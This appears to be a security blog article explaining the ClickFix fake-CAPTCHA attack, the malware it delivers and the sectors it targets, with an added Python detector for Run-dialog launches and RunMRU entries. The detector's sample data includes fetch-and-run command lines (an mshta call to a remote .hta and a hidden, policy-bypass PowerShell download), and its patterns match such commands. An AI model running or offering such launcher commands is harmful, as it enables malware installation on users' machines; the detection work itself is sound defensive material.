
Understanding the ClickFix attack

by Emma McGowan, Senior Writer

How three keystrokes can lead to malware infection

Imagine a cyberattack so simple yet so deceptive that all it takes is three keystrokes to compromise your system. This is the reality of the ClickFix attack, a threat that Resilience threat researchers have observed in the wild since 2024 and that seems to be ramping up in recent weeks. ClickFix cleverly manipulates users into executing malicious commands under the guise of a routine bot verification test. Originally used in targeted attacks, this technique has rapidly gained traction, posing a significant risk to a broader audience.

At first glance, ClickFix appears harmless—just another “Verify You Are a Human” CAPTCHA-like prompt. However, beneath this familiar facade lies a dangerous trick: users are guided through three seemingly benign keystrokes that ultimately lead to malware installation.

This attack preys on human behavior, exploiting trust in common online interactions to deploy password-stealing malware (aka infostealers), remote access trojans (RATs), and other malicious payloads. With cybercriminals refining their tactics to maximize efficiency and deception, understanding the mechanics of ClickFix is critical to preventing its spread.

How the ClickFix attack works

ClickFix thrives on social engineering, manipulating users into unwittingly executing malicious commands. This attack preys on human tendencies to solve perceived problems quickly, especially when faced with urgent or authoritative prompts. Because ClickFix requires user interaction, it can often evade automated security solutions that rely on detecting self-executing malware.

The attack typically begins with a deceptive pop-up on a compromised or malicious website. This pop-up mimics a standard bot verification message, often displaying an “I’m not a robot” checkbox. Upon interaction, users are prompted to complete three simple steps to confirm their identity.

The first step instructs users to press the Windows Key + R simultaneously. This shortcut opens the Run dialog box, a legitimate Windows feature that allows users to execute commands and programs quickly.

Next, users are told to press CTRL + V, which pastes into the Run prompt malicious code that the website has already placed on the system clipboard. The copy happens silently in the background, so users may not realize that a harmful command is what they are pasting.

Finally, pressing Enter executes the pasted command, triggering a download and execution of malicious code via mshta.exe, a Windows utility designed to run Microsoft HTML application files. This step compromises the device, enabling malware installation.
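The three-step sequence above leaves two artifacts a defender can look for: a process-creation event in which explorer.exe (the parent of anything launched from the Run dialog) spawns mshta.exe or PowerShell with a remote URL or hidden/encoded flags on its command line, and an entry in the user's Run-dialog history, which Windows stores under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The following Python is an added example, not code from the article or from Resilience; the log line format, the sample events and the sample registry values are constructed for the example, and the list of first-stage binaries beyond mshta.exe is an assumption about common variants.

```python
"""Detection helpers for the ClickFix Run-dialog execution pattern.

Added example. All sample data below is constructed; the '|'-separated
key=value event format is a stand-in for whatever the EDR or Sysmon
pipeline emits (Sysmon Event ID 1 carries the same field names).
"""
import re
from pathlib import PureWindowsPath
from typing import Dict, List

# mshta.exe is the launcher named in the article; the others are the usual
# alternatives seen in variants (assumption, extend to taste).
STAGE_ONE_BINARIES = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                      "curl.exe", "msiexec.exe", "rundll32.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# Hidden-window / encoded / policy-bypass PowerShell switches.
PS_EVASION_RE = re.compile(
    r"-(?:enc(?:odedcommand)?|w(?:indowstyle)?\s+hidden|nop(?:rofile)?|ep\s+bypass)\b",
    re.IGNORECASE)

# Constructed process-creation events: a normal explorer start, two ClickFix
# style launches, a benign PowerShell script run, and a service-launched mshta.
SAMPLE_EVENTS = [
    "UtcTime=2025-03-20 14:02:11|Image=C:\\Windows\\explorer.exe|CommandLine=explorer.exe|ParentImage=C:\\Windows\\System32\\userinit.exe",
    "UtcTime=2025-03-20 14:05:40|Image=C:\\Windows\\System32\\mshta.exe|CommandLine=mshta https://captcha-check.invalid/verify.hta|ParentImage=C:\\Windows\\explorer.exe",
    "UtcTime=2025-03-20 14:06:02|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell -w hidden -ep bypass -c iwr https://cdn.invalid/x|ParentImage=C:\\Windows\\explorer.exe",
    "UtcTime=2025-03-20 14:07:15|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell -File C:\\Scripts\\backup.ps1|ParentImage=C:\\Windows\\explorer.exe",
    "UtcTime=2025-03-20 14:08:00|Image=C:\\Windows\\System32\\mshta.exe|CommandLine=mshta https://cdn.invalid/y.hta|ParentImage=C:\\Program Files\\App\\svc.exe",
]

# Constructed RunMRU values. On a live host these come from
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU via winreg;
# each command is stored with a trailing "\1" and MRUList orders the slots
# most-recent first.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "winword /safe\\1",
    "c": "mshta https://captcha-check.invalid/verify.hta\\1",
}


def parse_event(line: str) -> Dict[str, str]:
    """Split a constructed 'key=value|key=value' event line into a dict."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return PureWindowsPath(path).name.lower()


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons an event matches the ClickFix pattern ([] if it does not).

    The parent check scopes this to launches from the shell (Run dialog); a
    URL or evasion flags are required so that double-clicking a local .hta or
    running a local script from Win+R does not fire on its own.
    """
    parent = basename(ev.get("ParentImage", ""))
    image = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    if parent != "explorer.exe" or image not in STAGE_ONE_BINARIES:
        return []
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("command line references a remote URL")
    if PS_EVASION_RE.search(cmd):
        reasons.append("hidden/encoded/bypass PowerShell flags")
    if reasons:
        reasons.insert(0, f"{image} launched from explorer.exe (Run dialog path)")
    return reasons


def flag_clickfix_events(lines: List[str]) -> List[Dict[str, object]]:
    """Scan event lines and return the matches with timestamp, image and reasons."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            hits.append({"time": ev.get("UtcTime", ""),
                         "image": basename(ev.get("Image", "")),
                         "reasons": reasons})
    return hits


def suspicious_runmru(values: Dict[str, str]) -> List[str]:
    """Return Run-dialog history entries, most recent first, that look like ClickFix launchers."""
    flagged = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw   # drop the "\1" suffix
        tokens = cmd.split()
        if not tokens:
            continue
        launcher = basename(tokens[0])
        if "." not in launcher:            # Run accepts "mshta" as well as "mshta.exe"
            launcher += ".exe"
        if launcher in STAGE_ONE_BINARIES and (URL_RE.search(cmd) or PS_EVASION_RE.search(cmd)):
            flagged.append(cmd)
    return flagged


if __name__ == "__main__":
    for hit in flag_clickfix_events(SAMPLE_EVENTS):
        print(hit["time"], hit["image"], "; ".join(hit["reasons"]))
    for cmd in suspicious_runmru(SAMPLE_RUNMRU):
        print("RunMRU:", cmd)
```

On the constructed data, only the two explorer.exe-spawned launches that reach out to a URL are reported, and the RunMRU scan surfaces the pasted mshta command even after the process itself has exited, which makes the registry key a useful triage artifact on a host a user reports as "I did the CAPTCHA thing." Where the Run dialog is not needed at all, the Group Policy setting "Remove Run menu from Start Menu" (User Configuration > Administrative Templates > Start Menu and Taskbar) also blocks the Windows Key + R shortcut, removing the first step of the sequence.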

What malware does ClickFix deliver?

ClickFix has been linked to several well-known malware families, including:

  • XWorm
  • Lumma stealer
  • VenomRAT
  • AsyncRAT
  • Danabot
  • NetSupport RAT

The specific payloads vary but commonly include PowerShell scripts, JavaScript, or portable executable (PE) files. These malware variants are often designed to steal financial credentials, log keystrokes, and grant remote attackers full control over an infected device.

Examples of ClickFix in the wild

ClickFix quickly expanded beyond its initial targeted attacks and now affects a range of industries and individuals. Cybercriminals use phishing emails, compromised websites, and social engineering tactics to deploy this attack across different sectors. While any internet user could potentially fall victim to ClickFix, specific industries have been disproportionately targeted due to their reliance on online communications and digital workflows.

Hospitality

A phishing campaign impersonating Booking.com has been leveraging ClickFix to target hospitality organizations. Fraudulent emails reference negative guest reviews, booking requests, or promotional opportunities to lure recipients into clicking malicious links. Microsoft tracks this campaign as Storm-1865, noting that it has been active since at least December 2024.

Healthcare

Cybersecurity firm Arctic Wolf has observed ClickFix attacks targeting healthcare professionals. One notable instance involved malicious code injected into the HEP2go physical therapy video site, redirecting users to ClickFix prompts.

Car dealerships

In March 2025, DarkReading reported on a ClickFix attack targeting car dealerships. More than 100 automotive industry websites were infected via the streaming service provider LES Automotive. It’s the second major attack on an auto industry third-party vendor in less than a year, following the CDK Global takedown last June.

General public

According to the U.S. Department of Health and Human Services, ClickFix has extensive reach and has appeared in many services used by the general public. Variants of this attack have been observed in:

  • Fake Google Chrome error pages
  • Pop-ups spoofing Facebook login pages
  • Impersonations of PDFSimpli and reCAPTCHA
  • Instances invoking PowerShell scripts from remote websites

How to protect yourself (and your organization) against ClickFix

Because ClickFix relies on social engineering, the best defense is employee education. Security training should always include guidance on how to recognize a phishing scheme, reinforced by regular simulated phishing exercises run by your IT team. With that in mind, here are some best practices to defend against phishing:

  • Educate employees on how to recognize phishing scams.
  • Warn employees to be skeptical of unexpected pop-ups requesting key combinations.
  • Encourage checking the sender’s email address carefully before taking action.
  • Advise contacting service providers directly to verify suspicious messages.
  • Caution against responding to emails with urgent calls to action.
  • Instruct employees to hover over links to inspect the full URL before clicking.
  • Teach employees to look for typos and subtle misspellings in emails and URLs.

The ClickFix attack is a reminder that cyber threats continue to evolve, finding new ways to bypass traditional security measures. Even seemingly innocuous actions—like pressing a few keys—can lead to real consequences if people are tricked into running malicious code.

Vigilance and skepticism are critical defenses against these attacks. Organizations and individuals must educate themselves on emerging threats, implement strong security protocols, and stay ahead of cybercriminal tactics.
